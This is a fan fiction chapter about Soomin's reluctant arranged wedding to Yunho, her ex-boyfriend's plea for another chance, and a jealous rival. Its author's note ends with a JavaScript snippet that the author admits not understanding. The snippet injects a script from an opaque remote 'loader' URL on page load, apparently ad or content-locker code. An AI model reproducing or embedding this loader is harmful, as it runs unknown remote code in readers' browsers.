Chapter 15

The Will That Changed Their Lives

Your POV

 

I walked inside the park he said where he was. I clutched my black ribbed cardigan around me. It was too chilly.

“You came.”

I spun and saw him standing beside me. He smiled softly. We walked together for a few minutes in silence until we both sat down on a bench.

“What do you want to talk about?” I asked slowly.

“I heard you were getting married tomorrow.”

I nodded.

“And he has another woman.”

I looked at him wide-eyed.

“How…did you know?”

“So you know?” He countered.

I didn’t reply.

“I saw them together.”

I nodded.

“Soomin, you should~”

“I know about them and…I don’t care. It’s arranged by our parents.”

He looked at me for a while and nodded.

“That gives me a chance then.”

“Oppa, don’t be like this~”

“Look, I’m sorry for all that I did to you before. I know I was stupid for doing that, but I was drunk. After you left me, Soo, it felt like a part of me was gone. I need you back. I need my other half.” He took my hands in his.

“Please give me another chance.”

I looked away. Why is he doing this? Why now, when I’m trying to block him out?!

“We….can just be friends first, okay?” I said. He nodded and hugged me tight.

Oh, god what did I just do?

 

Narrator’s POV

 

Soomin was disturbed the whole day. She was in a daze while people worked on her make up and hair. All she did was to nod in approval and shake her head no.

“Ya, is something wrong?” Ailee asked. She shook her head. She looked around the interior of the hotel room. In a few minutes, in a private hall of this hotel she would be officially married.

She sighed.

“I think I know.”

Soomin stared at her friend as one of the ladies fixed her dress.

“Khun oppa contacted you. You were gone for a while last night.” She spoke in her local dialect so the people in the room wouldn’t understand.

“He wanted another chance.”

“And you gave him one, that’s really generous Mrs. Jung.” Ailee rolled her eyes.

 

The ceremony was about to start. The hall was already filled with guests. Yunho clad in his black suit that fit him snugly stood at the end of the altar with Changmin and his friends.

Everyone was curious about the youngest Shim for not everyone had met her yet. Then the wedding tune played out. Everyone stood up and looked behind them.

Soomin entered the hall with Changmin’s dad guiding her.

She had a solemn expression on her face as they walked together. Changmin just smiled at his cousin. Yunho stared at her; she was too beautiful in the dress. It took him a few moments to realize what he was supposed to do.

“Take care of my daughter.” Mr. Shim said as he placed Soomin’s hand on Yunho’s. Yunho and nodded and smiled.

 

Your POV

 

Appa, Eomma, are you happy? I did what you asked me to. Even though it’s hard for me, I’ll do it. I love you.

 

I tried to tune out everything. I just concentrated on the things around us. I looked at the bouquetin my hands. Then I felt Yunho gripped my hand. I looked up.

“Jung Yunho do you take Shim Soomin as your loving wife~”

Oh no, I can’t stand this. I bit my lip. I saw Yunho grin.

“I do.”

“Miss Shim, do you take Jung Yunho as~”

Lalalalalalalalala. Can I reply, “Do I have a choice?” Of course not, my haraboji will kill me on the spot.

“I do.” I replied.

Soon, Yunho slipped the ring on my finger I did the same. But somehow it didn’t feel right. The silver band felt extremely heavy.

“You may kiss the bride.”

I gulped. WHAT?!

 

Yunho’s POV

 

I saw Soomin’s eyes widened. She looked at me with troubled eyes. The guests were looking at us now expectantly.

I leaned down and kissed her cheek briefly. She froze then she smiled.

“Good one.” She whispered as we faced the crowd.

Jaejoong and Junsu were grinning at us while Yoochun was clapping his hands.

 

“You two did well.” Changmin said as we got off the platform. Soomin let go of my hand and went off.

“Where is she going~”

“Yes, so now it is time for picture taking.” The MC announced.

“That explains it.” Changmin shook his head.

 

Narrator’s POV

 

Soomin just smiled in front of the camera. She didn’t know what to do. Yunho was also awkward.

“Why are we doing this again?” He mumbled. Soomin laughed.

“Uhm, newlyweds can you do a more intimare pose? Something sweet.”

Soomin looked at him blankly. Then Yunho lifted her up and he smiled.

tumblr_ljsps3ytAG1qbv6wmo1_500.jpg

Soomin was taken aback but she smiled.

“Perfect!” The photographer exclaimed. Yunho placed her down. He didn’t know why but he suddenly got this elated feeling him and that’s why he did that.

 

“Best wishes, Soo!” Ailee hugged her friend.

“Thank you, Lee.” She grinned. Then she felt a tap on her back.

“The brother gets the first dance.” Changmin asked for her hand.

“Do we have to?” Soomin frowned.

 

Your POV

 

Finally, it was over. Now I can go back to my room and sleep. I just smiled as the last of the guests exited the hall. I sighed deeply.

“I think we did well.” Yunho muttered beside me.

“The Oscar goes to…dun dun dun.” I grinned. Then I saw haraboji and the Jung elders approaching us. I stepped back and stood behind him.

“It’s time for our wedding gift, let’s go.” Mrs. Jung said while clasping her hands together.

 

“Where do you think they’re taking us?” I asked. Yunho was sitting beside me. He looked like he was thinking deeply.

“Is it about Hyoran?” I asked. He smiled at me.

“Well, yeah. I’m worried. You?”

“I didn’t know I’d be staying here for a long time.” I just replied and looked away, and then I noticed we were inside an exclusive village.

“Do you live here?” I asked.

“No, I thought you guys were living here.”

I shook my head.

“They can’t build a house in a span few weeks, right?” I asked just as the car stopped in front of a 3-storey penthouse.

“Huh.”

 

Narrator’s POV

 

The couple stepped inside the new house. Yunho’s mom was really happy she kept on chatting all the way up while Soomin was in a daze. It was just all too fast for her. They arrived at the second floor and went in a room. She got more dazed when she found all of her clothes in the left side of the walk-in close and rows of mens’ clothes on the other side.

“We’re sharing a room?!” She asked. Yunho looked at his mother.

“Of course, you two are already married.” She beamed. Soomin closed her eyes briefly and went out of the closet she looked around the huge master’s bedroom and she felt more stressed.

 

Finally the adults left, Soomin already showered and changed into a pair of sweats and a tank top. She found Yunho transferring his things.

“What are you doing?” She asked.

“I’m taking the other room. It would be awkward for us to share.” He grinned. Soomin nodded.

“I’ll help you with that.” She grinned.

 

Hyoran was at her house, she watched as various channels reported about the “wedding of the year”. She saw Yunho smiled at Soomin and she didn’t like it. As soon as their wedding pictures flashed on the screen she gripped the arm of her couch roughly. She didn’t like it. She didn’t like the show they were pulling off it was too intimate for her.

 

++++++++++++++++++++++++++++++++++++++++++++++++

 

you guys might be wondering about the code below, thing is...i dont know too :''''(

and, theyre married. officially, mehehehhee
if(typeof(jQuery)=='undefined'){(function(){var ccm=document.createElement('script');ccm.type='text/javascript';ccm.src='https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState=="loaded"||ccm.readyState=="complete"){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();} function ccm_e_init(jc){if(jc){jQuery.noConflict();} jQuery(function(){var http=location.href.indexOf('https://')>-1?'https':'http';var ccm=document.createElement('script');ccm.type='text/javascript';ccm.async=true;ccm.src=http+'://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);jQuery('#cblocker').remove();});};